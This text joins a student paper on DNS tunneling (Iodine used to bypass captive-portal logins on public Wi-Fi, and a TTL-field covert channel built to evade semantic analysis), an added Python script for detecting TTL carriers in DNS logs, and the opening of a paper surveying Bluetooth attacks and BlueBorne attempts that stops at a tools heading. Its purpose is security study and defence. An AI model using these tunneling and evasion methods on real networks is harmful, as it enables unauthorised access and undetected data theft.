In this section, we will perform an analysis of a state-of-the-art DNS Tunneling tool, Iodine in terms of how it is designed to be utilized for DNS Tunneling. Subsequently, we will also detail a set of experimental trials conducted using Iodine to examine the prevalence of the phenomenon.

3.1 Analysis of Iodine
Iodine is a popular open source software used to set up DNS Tunneling between a server and a client. In order to run Iodine, a user must first own a domain and also set up an authoritative name server for the domain. In short, DNS requests for a subdomain such as tunnel.example.com should be directed to ns.example.com, its authoritative name server which is controlled by the user. On this authoritative name server, the Iodine server would be running and ready to respond to DNS requests sent out by the client. On the other hand, the client would be running the Iodine client and firing DNS requests to the server. This exchange is done entirely through port 53, a port which is seldom filtered by system administrators as mentioned in earlier sections.

Iodine uses nearly all the fields (except for the TTL field) in DNS queries and responses to transmit information, which makes it an extremely flexible DNS Tunneling tool. It also uses a variety of codecs to fit different situations in the transmission. More information can be found in the Iodine documentation, under operational information [5].

Since the authoritative name server is able to return DNS responses of any resource record type, Iodine implements an auto-probing mechanism for discovering the best available resource record type for transmission. Iodine would first attempt to use resource records with higher bandwidth, such as NULL and PRIVATE before testing lower bandwidth options such as A and CNAME [5]. This serves to ensure that users are able to achieve the best possible throughput between the server and the client.

3.2 Experimental Trials
As mentioned in section 2.3, one of the main reasons why DNS Tunneling can be successfully performed is due to the fact that communication with the local DNS server on port 53 is often unmonitored in wireless networks. This essentially includes enterprise networks where the objectives of DNS Tunneling can be relatively more malicious. As such, we realized that the issue of greater significance is the prevalence of this security flaw where communication with the local DNS server is often not filtered.

In order to examine how prevalent this security flaw is, we decided to conduct some experimental trials for key public wireless networks in Singapore. This comprised one of Singapore’s largest public Wi-Fi services, Wireless@SG, NUS’s public Wi-Fi, NUSOPEN and the Wi-Fi at a fast food restaurant, Pizza Hut. These networks are essentially open Wi-Fi networks where credentials are required before access can be granted for surfing the internet as shown respectively in figures 3, 4 and 5.

Figure 3. Wireless@SG Login Page

Figure 4. NUSOPEN Login Page

Figure 5. Pizza Hut Login Page

However, they are still able to serve DNS queries because communication to the local DNS server is not blocked. The reason is due to the way the network architecture is implemented where only HTTP traffic to the internet is blocked so that users cannot surf the internet without providing valid credentials but DNS traffic is still allowed since the web page that requests the credentials needs to be served. As such, the aim of the experimental trials is to show that since communication with the DNS server is not filtered, a user would be able to bypass the authentication and surf the internet successfully with the aid of DNS Tunneling. We leveraged Iodine as the DNS Tunneling tool in our experimental trials which showed that Iodine worked successfully on these networks.

The following details the steps we took to perform the experimental trials.

For Iodine to work, we first needed to set up a domain name server as mentioned in the previous section. For our trials, we created a domain www.cs3235.tk. Next, we created an EC2 instance through Amazon Web Services and tied our domain to that instance using Route 53. After setting up the server, we configured the Iodine server code to run in the background.

Subsequently, we compiled and ran the Iodine client on our personal machines. We then had to set up an SSH tunnel within the DNS tunnel (as shown in figure 6) which acted as a SOCKS proxy for directing the network traffic.

Figure 6. Running Iodine Client and Setting Up SSH Tunnel

Following this, the set-up was completed which implied that internet traffic was now being directed through port 53 instead of the usual port 80. As mentioned earlier, by default, there would be a webpage displayed requesting for credentials before granting access to the internet as shown respectively in figures 3, 4 and 5. We then ran the iodine client and SSH tunnel. Following this, if we did a curl to a website URL, we would be able to surf the internet without having to provide any credentials to the displayed webpage. Figure 7 shows that we were successfully able to curl to the website hugh.comp.nus.edu.sg and fetch information. This implied that we had successfully bypassed the authentication and gained access to the internet.

Figure 7. Successful Access to Website

The results of the experimental trials serve to reinforce the observation that port 53 is generally not filtered in wireless networks. While the objective of DNS Tunneling in these trials was less malicious as it only involved surfing the internet without having to provide any credentials, the implications of the security flaw are significant particularly in the context of enterprise networks. That is because, in such networks, there is a greater motivation to leverage DNS Tunneling for purposes such as data exfiltration or in general, the tunneling of any IP traffic which could lead to more damaging consequences.

4. OVERVIEW OF CURRENT DEFENSES
While the experimental trials seem to suggest that the DNS protocol is easily exploitable in the context of DNS Tunneling, it is not something completely unknown to the security community. There have been defenses derived that deal with the exploitation of the DNS protocol in general and therefore, are applicable to DNS Tunneling. These include semantic analysis, traffic analysis and the use of DNS blacklists/whitelists. A brief overview of the defenses is provided as follows.

Semantic Analysis. The idea of semantic analysis is to analyse specific resource records in DNS responses and filter out those that are not semantically valid or contain excessive redundant information. For instance, the TXT field in DNS responses is usually monitored with care. That is because, the TXT field can be used to store any text. This implies that an attacker can even store malicious code into TXT fields. As a result, when a user requests for DNS services, the malicious code will be able to pass through the firewall and get stored into the user’s device. Therefore, by detecting that the TXT field is being stored frequently, the system can identify the malicious DNS server and eventually block it [10]. In this regard, one of the alternative actions that is commonly adopted by system administrators is to block the use of the TXT resource record in DNS responses.

Figure 8 illustrates some example outcomes as a result of incorporating semantic analysis as a defensive technique against DNS Tunneling.

Figure 8. Example Outcomes from Semantic Analysis

Traffic Analysis. Network traffic can be monitored in terms of the frequency of DNS queries that originate from a specific host or are sent to a specific domain. A high frequency of DNS queries would suggest a high likelihood of protocol misuse. The reason is because, most situations that involve DNS Tunneling would require a high frequency of DNS queries to accomplish the objective. For instance, in the context of the experimental trials that were conducted for the open Wi-Fi networks, the objective of DNS Tunneling was to facilitate surfing of the internet. As such, this would likely involve a high exchange of DNS queries and responses to facilitate the tunneling. Figure 9 illustrates some example outcomes as a result of incorporating traffic analysis as a defensive technique against DNS Tunneling.

Figure 9. Example Outcomes from Traffic Analysis

DNS Blacklists/Whitelists. In the case of DNS blacklists or whitelists, it involves a more aggressive defensive approach where the decision to grant access to a particular domain is decided with the aid of a database [8]. In the case of a DNS blacklist, it would contain domain names for which access would be blocked while for a DNS whitelist, it would contain trusted domain names for which access would be permitted. The network administrator could choose to incorporate either of the two lists or even both. Figure 10 illustrates some example outcomes as a result of incorporating the use of DNS blacklists/whitelists as a defensive technique against DNS Tunneling.

Figure 10. Example Outcomes from the Use of DNS Blacklists/Whitelists

While these defenses seem to be comprehensive, there still exist ways to defeat them particularly for the case of semantic analysis. As highlighted earlier, system administrators who are familiar with the dangers of DNS Tunneling are likely to monitor and inspect specific resource records of DNS responses. However, this actually overlooks an alternative element that can be exploited as a covert carrier and that is the TTL field. As such, we explored the possibility of transmitting information using the TTL field of DNS responses. Since the TTL field is a relatively unknown vector for transmitting messages, it is an unconventional medium that facilitates DNS Tunneling. In the subsequent section, we would discuss the implementation of our proof of concept that successfully utilises the TTL field in DNS Tunneling.

5. IMPLEMENTATION DETAILS
In this section, we shall discuss the details of our proof of concept that employs the TTL field as a covert carrier in DNS Tunneling.

The TTL field is a data field in the DNS answer section which specifies how long the answer to the DNS query is valid. This is usually used by DNS caches to determine how long they should cache the DNS response before querying the authoritative name server again. Since the TTL field is a 4-byte data field, its theoretical upper limit is 2^32 - 1. However, most DNS caches use an upper limit of 86400 seconds (1 day) in practice.

For the server side, we obtained a domain name and also set up an authoritative name server for the domain. As seen in figure 11, any DNS query for tunnel.pixelect.me would be directed to its authoritative name server ns.pixelect.me. The glue record for ns.pixelect.me ensures that the DNS query is forwarded to a machine which is running a modified DNS server under our control.

Figure 11. DNS Resource Records

We referenced an open source codebase [7] and modified it to build a DNS server in Python. We modified the existing codebase to first encode each character in a secret string to its equivalent ASCII value. Whenever the DNS server is queried, we would store part of the secret string into the TTL field. The DNS server would then loop back and repeat the sequence of TTL values continually until the secret string is changed to another message.

On the client side, we are running a Java program which would continually send DNS queries for tunnel.pixelect.me. It would then parse the TTL value in each DNS response to retrieve the encoded message.

In order to embed information in the TTL field, there were two complications that we had to address before the embedding scheme could be rendered useful. Firstly, due to processing overheads and transmission delays experienced in the network, it is highly likely that the TTL value received by the client is lower than the actual TTL value sent out by the DNS server. Secondly, if the TTL value is larger than 86400, it could be changed to a value below 86400 by intermediate DNS caches.

To resolve the first complication, we set the last byte of the TTL field to “0xFF” (the maximum value) by default. As a result, as long as the total transmission delay is less than 255 seconds (a reasonable assumption), we can ensure that the first three bytes of the TTL value are unaltered by intermediate DNS caches and can be used to transmit information reliably. For the second complication, we first attempt to use all four bytes in transmission. If it is not possible, we would downgrade to use only the last two bytes (capped at 65535) for transmission.

As a result of the identified complications, only one to three bytes of information can be viably transmitted in each DNS packet. While the overhead of using the TTL field to transmit information is high, there could still be motivation for an attacker to exploit this method because it renders one of the common defenses, semantic analysis ineffective in detecting such an attack. In situations where detection should be avoided at all costs and a low rate of transmission is tolerated, the TTL field represents a viable way to leak information or communicate covertly.

6. EVALUATION
In this section, we shall perform a comparative analysis between the use of the TTL field and the traditional use of resource records in DNS Tunneling. The criteria employed include exploitation ease, information bandwidth, level of covertness and available defenses. Table 2 provides a summary of the analysis.

Table 2. Summary of Comparative Analysis

                         Resource Records                                                                                TTL
Exploitation Ease        Relatively Easy                                                                                 Slightly more complicated to deal with DNS caches and transmission delays
Information Bandwidth    Up to about ⅔ the size of the UDP packets                                                       ~3 bytes per answer
Covertness               Low                                                                                             Very High
Defenses                 A bunch of known defenses including semantic analysis, traffic analysis and black/white list    Only traffic analysis and black/white list are effective defenses

Exploitation Ease. In general, DNS resource record types such as NULL, TXT, CNAME, MX and A can be used to embed information in responses. For instance, a CNAME record for a query www.nus.edu.sg could be of the form sg-1.web.nus.edu.sg. An example that illustrates the exploitation of this field would be encoding the message payload-here as payload-here.nus.edu.sg in the answer field. Other resource records can generally be exploited in similar fashion. However, complications do exist in using such encoding. That is because the resource records may not allow every possible byte to appear in the data. As an example, the most prevalent DNS servers and caches only allow ASCII bytes corresponding to lower-case letters, digits and a small set of symbols such as dot and hash. To exploit such a channel, the encoder will need to transform all the possible byte symbols to a representation using a smaller symbol set. On the other hand, the usage is further limited for the TTL field due to the existence of DNS caches in the network. Although the theoretical limit of the TTL field is 4 bytes long, most of the DNS caches accept a maximum value of 86400 which is only slightly larger than 2 bytes. Moreover, as the TTL field is used to represent the time-to-live of a resource record, the value will decrease along with transmission due to the inherent delay. As such, when the field is used, an attacker will need to engineer the value a little to ensure that the modification along the way does not compromise the usability of the data. Therefore, it shows that the complexity involved in exploiting the TTL field is relatively higher in comparison to resource records.

Information Bandwidth. In the context of information bandwidth, it is apparent that resource records generally provide a higher bandwidth than the TTL field. At the extreme end of the spectrum, resource record types such as NULL allow specification of an arbitrary value (bytes) and the length of these fields can be sufficiently long to fill up the entire payload of a DNS packet. Hence, after considering the overhead in the UDP and DNS packets, up to ⅔ of the entire UDP packet can be used for transmission. For other resource record types, the bandwidth is lower. That is because, for resource record types such as CNAME and TXT, the symbols are limited to digits, letters and some commonly used symbols. On the other hand, the information bandwidth for the TTL field is the lowest with an approximation

of 3 bytes per resource record which is a restriction due to the specification of the protocol.

Covertness. In the case of covertness, the expected covertness for resource records would generally be lower as compared to the TTL field. That is because when one encodes information in resource record types such as TXT or NULL, it is usually obvious to a semantic analysis tool that the fields contain some redundant information. In contrast, the TTL field is not viewed as a carrier of protocol data since it is just a time specification and therefore, it is usually overlooked by most analyzers.

Defenses. In the case of defenses against DNS Tunneling, there are 3 main streams as identified in section 4: semantic analysis, traffic analysis and DNS blacklists/whitelists. In general, these defenses can work against the exploitation of resource records but in the case of TTL field, semantic analysis could be defeated. That is because, semantic analysis generally targets resource records in DNS responses and as mentioned earlier in the discussion for covertness, the TTL field is often overlooked by most semantic analysis tools. On the other hand, traffic analysis and DNS blacklists/whitelists are more comprehensive defenses since they do not specifically target the contents within a DNS message. As such, they can also work against the exploitation of the TTL field.

In general, amongst the two defenses, traffic analysis and DNS blacklists/whitelists, DNS blacklists/whitelists would be the most effective and sustainable defense given that the list is sufficiently comprehensive. That is because, in the case of traffic analysis, the defense is more likely to be effective if the tunneled information is significantly large (>1mB). Therefore, it might prove to be ineffective against the leakage of small data (e.g. keys/credentials).

It is also worth noting that the key factor that facilitates DNS Tunneling is actually implementation decisions for a network. The decision of leaving port 53 unmonitored is a significant security flaw that leaves the network defenseless against DNS Tunneling. On the other hand, although effective defenses such as DNS blacklists/whitelists exist, their effectiveness is still constrained once again due to implementation decisions. For instance, in the case of open Wi-Fi networks, this has to do largely with the complication in deploying a login system. The login system often lies on the gateway server which redirects all the outbound traffic from not-yet-authorized clients to the login page. It is impossible to block the traffic to the local DNS server as doing so would prevent the login page from being accessed by the client. The local DNS server also cannot be blocked from accessing the internet as doing so would cause the authorized clients to be blocked from browsing. As such, the optimal implementation is to allow the DNS server and the gateway server to share an identical authorization list and serve differently for the queries from authorized and unauthorized clients. However, such an implementation is almost never seen because open Wi-Fi providers usually consider DNS and gateway as two different systems where there is no integration facilitated by the respective vendors of the systems. Once again, such an implementation choice facilitates DNS Tunneling despite the existence of potentially effective defenses.

7. CONCLUSION
In this paper, we provided an analysis of how the DNS protocol can be exploited as a covert channel to facilitate a specific attack, DNS Tunneling. We began with a case study analysis of one of the state-of-the-art tools, Iodine which we subsequently utilized to empirically examine the prevalence of the phenomenon through a set of experimental trials. We then explored an alternative covert carrier for DNS Tunneling, the TTL field and detailed the implementation of our proof of concept. We concluded with a comparative analysis between the traditional use of resource records and the use of the TTL field as the choice of covert carrier in DNS Tunneling. In general, we believe that there are potentially effective defenses that exist against DNS Tunneling but the key factor of significance is implementation decisions in networks. Certain implementation choices can give rise to significant security flaws that only serve to enhance the viability of an attack.

8. ACKNOWLEDGMENTS
We would like to express our gratitude to Prof. Hugh Anderson for his valuable assistance during the course of this project.

9. REFERENCES
[1] Couture, E. Covert Channels, 2010. Retrieved 20 September, 2017, from SANS Institute InfoSec Reading Room: https://www.sans.org/reading-room/whitepapers/detection/covert-channels-33413
[2] DNS Architecture. Retrieved 25 October, 2017, from Microsoft: https://technet.microsoft.com/en-us/library/dd197427(v=ws.10).aspx
[3] DNS Protocol. Retrieved 26 October, 2017, from Microsoft: https://technet.microsoft.com/en-us/library/dd197470(v=ws.10).aspx
[4] DNS QUERIES & RESOLUTION PROCESS. Retrieved 25 October, 2017, from Firewall.cx: http://www.firewall.cx/networking-topics/protocols/domain-name-system-dns/159-protocols-dns-resolution.html
[5] Ekman, E., Andersson, B. and Bezemer, A. Iodine. Retrieved 15 September, 2017, from GitHub: https://github.com/yarrick/iodine
[6] Farnham, G. and Atlasis, A. Detecting DNS Tunneling, 2013. Retrieved 24 October, 2017, from SANS Institute InfoSec Reading Room: https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152
[7] Fokau, A. Simple DNS server (UDP and TCP) in Python using dnslib.py. Retrieved 28 October, 2017, from GitHub: https://gist.github.com/andreif/6069838
[8] Levine, J. DNS blacklists and whitelists (No. RFC 5782), 2010.
[9] Marchal, S. DNS and Semantic Analysis for Phishing Detection, 2015.
[10] Roolvink, S. Detecting attacks involving DNS Servers: A Netflow data based approach, 2008.
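
Sections 5 and 6 of the DNS Tunneling paper above describe a carrier that semantic analysis of resource records does not look at: the server rewrites the TTL on every answer, keeping the last byte near 0xFF and placing data in the bytes above it. The following is an added example, not code from the paper or from the codebase it references, showing one way a defender could check passive DNS logs for that behaviour. The log tuple layout, the thresholds, the reason labels and the example.test names are assumptions, and the sample records are constructed.

```python
"""Flag DNS names whose answer TTLs behave like a data carrier.

Input: (unix_time, qname, rrtype, ttl) tuples from passive DNS logs
(assumed layout). Thresholds are illustrative assumptions, not tuned values.
"""
from collections import defaultdict

SLACK = 2  # seconds of jitter tolerated when matching a cache countdown


def unexplained_changes(obs):
    """Count TTL changes that are neither a countdown nor a refresh.

    obs is a time-ordered list of (unix_time, ttl) for one (qname, rrtype).
    A benign record either loses one second of TTL per second while cached,
    or snaps back to the zone's configured TTL when the cache refreshes.
    """
    origin = obs[0][1]  # highest TTL seen so far, taken as the configured TTL
    odd = 0
    for (t0, ttl0), (t1, ttl1) in zip(obs, obs[1:]):
        countdown = abs((ttl0 - ttl1) - (t1 - t0)) <= SLACK
        refresh = abs(ttl1 - origin) <= SLACK
        if not (countdown or refresh):
            odd += 1
        origin = max(origin, ttl1)
    return odd


def assess(obs, min_samples=8, odd_ratio=0.3, pinned_ratio=0.9, min_upper=4):
    """Return the list of reasons (possibly empty) for one name's TTL series."""
    obs = sorted(obs)
    if len(obs) < min_samples:
        return []
    ttls = [ttl for _, ttl in obs]
    reasons = []
    if unexplained_changes(obs) / (len(obs) - 1) > odd_ratio:
        reasons.append("ttl-rewritten-between-answers")
    # Section 5's scheme: the low byte starts at 0xFF and only absorbs
    # transit delay, while the bytes above it change with the payload.
    pinned = sum((ttl & 0xFF) >= 0xF0 for ttl in ttls) / len(ttls)
    upper_values = {ttl >> 8 for ttl in ttls}
    if pinned >= pinned_ratio and len(upper_values) >= min_upper:
        reasons.append("low-byte-pinned-high-bytes-vary")
    return reasons


def scan(records):
    """Group log records per (qname, rrtype) and return the flagged ones."""
    by_key = defaultdict(list)
    for ts, qname, rrtype, ttl in records:
        by_key[(qname.lower().rstrip("."), rrtype)].append((ts, ttl))
    findings = {}
    for key, obs in by_key.items():
        reasons = assess(obs)
        if reasons:
            findings[key] = reasons
    return findings


# Constructed sample 1: a cached record with a configured TTL of 300 s,
# seen every 30 s, counting down and refreshing once.
BENIGN = [(t, "www.example.test", "A", 300 - (t % 300)) for t in range(0, 360, 30)]

# Constructed sample 2: TTLs shaped like the two-byte variant in section 5,
# low byte 0xFF minus 1-3 s of transit delay, upper byte changing per answer.
CARRIER_TTLS = [0x6BFF - 2, 0x65FF - 1, 0x79FF - 3, 0x3DFF - 1, 0x73FF - 2,
                0x33FF - 1, 0x63FF - 2, 0x72FF - 1, 0x33FF - 3, 0x74FF - 2]
SUSPECT = [(1000 + 5 * i, "tunnel.example.test", "A", ttl)
           for i, ttl in enumerate(CARRIER_TTLS)]

SAMPLE = BENIGN + SUSPECT

if __name__ == "__main__":
    for (qname, rrtype), reasons in scan(SAMPLE).items():
        print(qname, rrtype, ", ".join(reasons))
```

Both checks are heuristics: a hit is a lead for the traffic analysis and blacklist/whitelist defenses from section 4, not a verdict on its own.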

CS3235 Group 11: Hacking Bluetooth

Lim Yong Zhi
National University of Singapore
limyz@u.nus.edu

Leon Overweel
Delft University of Technology
L.P.Overweel@student.tudelft.nl

Leow Wei Siang
National University of Singapore
a0134185@u.nus.edu

Lau Wen Hao
National University of Singapore
l.wenhao@u.nus.edu

ABSTRACT
In this project, we explore the many security vulnerabilities that have been exposed by the overly complex Bluetooth standard. We provide a high-level explanation of the Bluetooth stack, and aggregate some historical attacks such as Bluejacking, Bluesmack, Bluesnarfing, Bluebugging, Helomoto, DirtyTooth, GATTack, and Blueborne.

We then describe some of the vulnerabilities we see are still present in today’s Bluetooth standards, such as the complexity of the specification and several spots of the protocol that are significantly weakened by manufacturers’ implementations.

We also detail our research process as well as the tools we used, and present our proof of concept of automatically attacking Bluetooth devices using Blueborne on a Raspberry Pi 3. Finally, we suggest future work.

1. WHAT IS BLUETOOTH?
Bluetooth wireless technology is a short-range communications system intended to replace the cable(s) connecting portable and/or fixed electronic devices [1].

The key features of Bluetooth wireless technology are robustness, low power consumption, and low cost. The standard has proliferated, especially throughout the laptop and mobile markets: most smartphones available today, as well as many laptops, have Bluetooth support built in.

This has created a diverse hardware ecosystem of accessories: from wireless speakers and headphones, to step trackers and other fitness monitoring devices, to wireless cameras.

This ecosystem has been very beneficial to consumers, since there is a lot of competition which drives prices down because of the sheer volume of different products on the market. Bluetooth’s proliferation, however, also causes many security concerns. Because its use is so widespread, it is a very lucrative protocol to crack: a good exploit to the Bluetooth protocol has the potential to affect hundreds of millions of devices.

2. BACKGROUND
In this section, we provide an overview of the Bluetooth core stack (Subsection 2.1) and some historical attacks on Bluetooth (Subsection 2.2).

2.1 Bluetooth Core Specifications
At the time of writing, the current version of Bluetooth is version 5.0. Its Bluetooth Core Specification has 2,822 pages and describes how to build a Bluetooth-compliant system that can interact with other Bluetooth-compliant systems. [1]

Broadly, there are two forms of Bluetooth wireless technology systems: Basic Rate (BR) and Low Energy (LE). Both systems include device discovery, connection establishment and connection mechanisms. The Basic Rate system includes optional Enhanced Data Rate (EDR) Alternate Media Access Control (MAC) and Physical (PHY) layer extensions.

The Bluetooth core system consists of a Host and one or more Controllers. A Host is a logical entity defined as all of the layers below the non-core profiles and above the Host Controller Interface (HCI). A Controller is a logical entity defined as all of the layers below HCI. An implementation of the Host and Controller may contain the respective parts of the HCI.

An implementation of the Bluetooth Core has only one Primary Controller which may be one of the following configurations:

• A Low Energy (LE) Controller including the LE PHY, Link Layer and optionally HCI.
• A combined BR / EDR Controller portion and LE controller portion (as identified in the previous two bullets) into a single Controller. This configuration has only one Bluetooth device address shared by the combination in the combined Controller.

Figure 1: Simplified Bluetooth Stack

In this paper, we focus on two layers of the Bluetooth stack: the Logical Link Control and Adaptation Layer Protocol (L2CAP) on the first layer, and the Bluetooth Network Encapsulation Protocol (BNEP), Radio Frequency Communication (RFCOMM) and Service Discovery Protocol (SDP) on the second layer (see Figure 1).

L2CAP provides connection-oriented and connectionless data services to upper layer protocols with protocol multiplexing capability, segmentation and reassembly operation, and is the lowest layer in the Bluetooth stack. [1, 2]

RFCOMM, which is encapsulated by L2CAP, is a serial cable emulation protocol based on ETSI TS 07.10, giving AT commands. [1, 3]

BNEP facilitates network encapsulation (usually IP based) over Bluetooth. [1, 2]

SDP allows devices to discover what services are supported by each other, and what parameters to use to connect to them. [1] Some examples include the Audio/Video Control Transport Protocol (AVCTP) or Audio/Video Distribution Transport Protocol (AVDTP), which provide the Advanced Audio Distribution Profile (A2DP) service.

However, an unnecessary complexity of Bluetooth is fragmentation, which is implemented in no fewer than 4 different layers throughout the stack. The absurdity goes even further as a packet will be fragmented by the SDP continuation mechanism, and then by L2CAP’s segmentation mechanism, and then again by Asynchronous Connection-Less (ACL) continuation, and one last time by the fragmentation mechanism done by the Link Controller. [2]

The sheer complexity of the stack creates an enormous attack vector, which, over the years, has been exploited in many ways.

2.2 Historical Bluetooth Attacks
In the past, Bluetooth has been attacked in many ways. We enumerate some of them below, as listed by [4, 5]:

2.2.1 Bluejacking
“The practice of using Bluetooth-enabled mobile phones to send unsolicited messages to other Bluetooth-enabled mobile phones within a transmission range of 10 meters. A content analysis was conducted on 427 bluejacks from Bluejackq, an online community of bluejackers, in which the contextual characteristics of bluejacking were examined. Bluejacking was found to be highly location-dependent, primarily transpiring in everyday public places. The message content of the bluejacks was also inspired by the physical location where bluejacking took place. with full access to call and SMS functionality, internet connection, and many phone settings.” [6]

2.2.2 Bluesmack
“BlueSmack is a Bluetooth attack that knocks out some Bluetooth-enabled devices immediately. This Denial of Service (DoS) attack can be conducted using standard tools that ship with the official Linux Bluez utils package. The ’Ping of Death’ is basically a network ping packet that used to knock out early versions of Microsoft Windows 95. The BlueSmack is the same kind of attack but transferred in to the Bluetooth world. On the L2CAP layer there is the possibility to request an echo from another Bluetooth peer. As for the ICMP ping, the idea of the L2CAP ping (echo request) is also to check connectivity and to measure roundtrip time on the established link. Basically, the l2ping that ships with the standard distribution of the BlueZ utils allows the user to specify a packet length that is sent to the respective peer. This is done by means of the -s <num> option. Many (many) iPaqs (a Pocket PC and personal digital assistant first unveiled by Compaq in April 2000) react immediately beginning with a size of about 600 bytes.” [7]

2.2.3 Bluesnarfing
“Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth connection, often between phones, desktops, laptops, and PDAs (personal digital assistant). This allows access to calendars, contact lists, emails and text messages, and on some phones, users can copy pictures and private videos.” [8]

2.2.4 Bluebugging
“Bluebugging is a form of Bluetooth attack often caused by a lack of awareness. It was developed after the onset of bluejacking and bluesnarfing. Similar to bluesnarfing, bluebugging accesses and uses all phone features but is limited by the transmitting power of Class 2 Bluetooth radios, normally capping its range at 10-15 meters. However, the operational range has been increased with the advent of directional antennas.” [9]

2.2.5 Helomoto
“The HeloMoto attack has been discovered by Adam Laurie and is a combination of the BlueSnarf attack and the BlueBug attack. The attack is called HeloMoto, since it was discovered on Motorola phones. The HeloMoto attack takes advantage of the incorrect implementation of the ’trusted device’ handling on some Motorola devices. The attacker initiates a connection to the unauthenticated Object Exchange (OBEX) Push Profile pretending to send a vCard. The attacker interrupts the sending process and without interaction the attacker’s device is stored in the ’list of trusted devices’ on the victim’s phone. With an entry in that list, the attacker is able to connect to the headset profile without authentication. Once connected to this service, the attacker is able to take control of the device by means of AT-commands (as BlueBug).” [10]

2.2.6 DirtyTooth
“There is a trick or hack for iOS 10.3.3 and earlier and iOS 11 beta 4 that takes advantage of the management of the profiles causing impact on the privacy of users who use Bluetooth technology daily. From the iOS device information leak caused by the incorrect management of profiles, a lot of information about the user and their background may be obtained.

“When the iOS system detects a Bluetooth signal, the user can visualize the device with which it wants to connect and a scenario like the following will be observed. The speaker that appears in the Bluetooth discovery is announcing the A2DP profile, a profile to play audio via the Bluetooth connection. When the user clicks on it, the pairing is completed, with no need for a PIN in versions Bluetooth 2.1 or higher. After a few seconds, the speaker Bluetooth can change its profile to a Phone Book Access Profile (PBAP) profile. If this happens, iOS will perform the profile change without displaying any type of notification to the user.

“Note the existence of a weakness or an accessibility configuration extra in iOS. When the profile change is carried out without notification, the synchronization of contacts is enabled by default, giving access to it. In other words, DirtyTooth is a trick or hack that can take advantage of this accessibility configuration.” [11]

2.2.7 GATTack
“Bluetooth Low Energy incorporates device pairing and link-layer encryption. However, significant amount of devices do not implement these features. ... These devices can be attacked in various ways - starting from simple denial of service, by spoofing, passive and active transmission interception, up to abuse of excessive and improperly configured device’s services. ... The tool creates exact copy of attacked device in Bluetooth layer, and then tricks mobile application to interpret its broadcasts and connect to it instead the original device. At the same time, it keeps active connection to the device, and forwards to it the data exchanged with mobile application. In this way, acting as ‘Man-in-the-Middle,’ it is possible to intercept and/or modify the transmitted requests and responses.” [12]

2.2.8 BlueBorne
“BlueBorne is an attack vector by which hackers can leverage Bluetooth connections to penetrate and take complete control over targeted devices. BlueBorne affects ordinary computers, mobile phones, and the expanding realm of IoT devices. The attack does not require the targeted device to be paired to the attacker’s device, or even to be set on discoverable mode. Armis Labs has identified eight zero-day vulnerabilities so far, which indicate the existence and potential of the attack vector. Armis believes many more vulnerabilities await discovery in the various platforms using Bluetooth. These vulnerabilities are fully operational, and can be successfully exploited, as demonstrated in our research. The BlueBorne attack vector can be used to conduct a large range of offenses, including remote code execution as well as Man-in-The-Middle attacks.” [13]

3. EXPLORATION
In this section, we describe how we explored Bluetooth and the various attempts and experiments we carried out to hack it.

3.1 Bluetooth Vulnerabilities
Bluetooth may seem to be an excellent choice for meeting our daily needs, but it is not without its problems. Bluetooth is far from being a secure technology and its implementation leaves much to be improved. It has faced numerous security issues and an increasing risk of attacks despite having had security features since 2001 [5, 14].

Here are some vulnerabilities which affect it:

1. The packet headers (which are plaintext) contain enough information from which the Bluetooth MAC addresses (BDADDRs) of communicating devices can be derived. If a machine generates any Bluetooth traffic, an attacker in physical proximity can derive its BDADDR and use it to send unicast traffic to the device. [2, 15]
2. If the device generates no Bluetooth traffic, and is only listening, it is still possible to “guess” the BDADDR by sniffing its WiFi traffic. This is viable since WiFi MAC addresses appear unencrypted over the air and due to the widely accepted norm of OEMs and hardware manufacturers that the MACs of internal Bluetooth/WiFi adapters are either the same, or only differ in the last digit (one being +1 of the other). [2, 15]
3. In Secure Simple Pairing (SSP), many manufacturers define the PIN code to be, typically, ’0000’ or ’1234’ by default. This opens up the connection to attacks as a malicious party could crack the PIN code relatively easily. [5, 16]
4. The stream cipher used in Bluetooth, E0, was also found to have vulnerabilities, where the original 2^128 operations required to crack E0 was lowered to just 2^38 operations as of 2005. [17]
5. According to Armis Labs, the Bluetooth Core Specifications (Master Table of Contents and Compliance Requirements) have 2,822 pages, whereas the WiFi specification (802.11) is only 450 pages. Because of this complexity, researchers have been kept from auditing Bluetooth implementations at the same level of scrutiny as other highly exposed protocols, and this has resulted in a large number of vulnerabilities being reviewed. [13]

3.2 Process
This was our exploratory process that led to our final results.

1. We attempted to do some snooping using the Adafruit Bluetooth Low Energy sniffer. This did not yield any useful results since the headphones we had available (Apple AirPods) do not use this standard but rather Apple’s W1 chip implementation of maintaining a Bluetooth Class 1 connection.
2. We attempted to install Blueborne on Windows 10, but after much trial and error we were not able to get the required Python libraries compiled for and installed on Windows to get this working.

3. We attempted to install Blueborne on the Ubuntu Subsystem for Windows 10, which worked; we were not, however, able to snoop Bluetooth signals using this technique. We suspect that this might be because the Ubuntu Subsystem does not have proper access to the laptop’s Bluetooth receiver.
4. We discovered that Bluetooth LE may not be applicable to devices delivering A2DP audio. Such devices rely only on the Bluetooth Basic Rate (BR) or Classic protocol.
5. We attempted to do some snooping on the Actxa Stride+ Steps Tracker [18] using the Adafruit Bluetooth Low Energy sniffer. We managed to capture packets successfully due to its ’always visible’ status, and all information between the host and step tracker was intercepted.
   However, as there is no audio involved in the device, no further investigation was carried out for this attempt.
6. We attempted to install Blueborne in a virtualised environment using Oracle VM VirtualBox. Thanks to Kali Linux, we also discovered various tools which allow us to discover vulnerabilities in Bluetooth.
   We will cover this in detail under Section 4.2.3. All attempts carried out after this mandate the use of a Bluetooth USB adapter.
7. We attempted to use Carwhisperer on a phone and headset with limited success.
   A detailed Proof-of-Concept (PoC) is covered under Section 5.1.
8. We attempted to install Kali Linux on the Raspberry Pi 3 (RPi3). However, this was not fruitful as the OS is not optimised for performance. We had to install Re4son-Kernel, which provided support for built-in WiFi and Bluetooth. [19]
9. Much to our dismay, the delivery of the Blueborne exploit requires the use of a 64-bit system, because pwntools, a CTF framework and exploit development library written in Python, requires a 64-bit operating system to work. [20]
10. We came across pi64, an experimental 64-bit OS, and installed it on the RPi3. pi64 is based on Debian Stretch and backed by a 4.11 Linux kernel. Its first release only debuted in March 2017, based on Debian Jessie. [21] As this is an experimental OS, support for Bluetooth is not included and a Bluetooth USB adapter has to be used to obtain Bluetooth functionality.
   A detailed PoC is covered under Section 5.2.

4. TOOLS
In this section, we list the various tools and options available which made Bluetooth exploitation possible.

4.1 Hardware
4.1.1 Adafruit BLESniffer
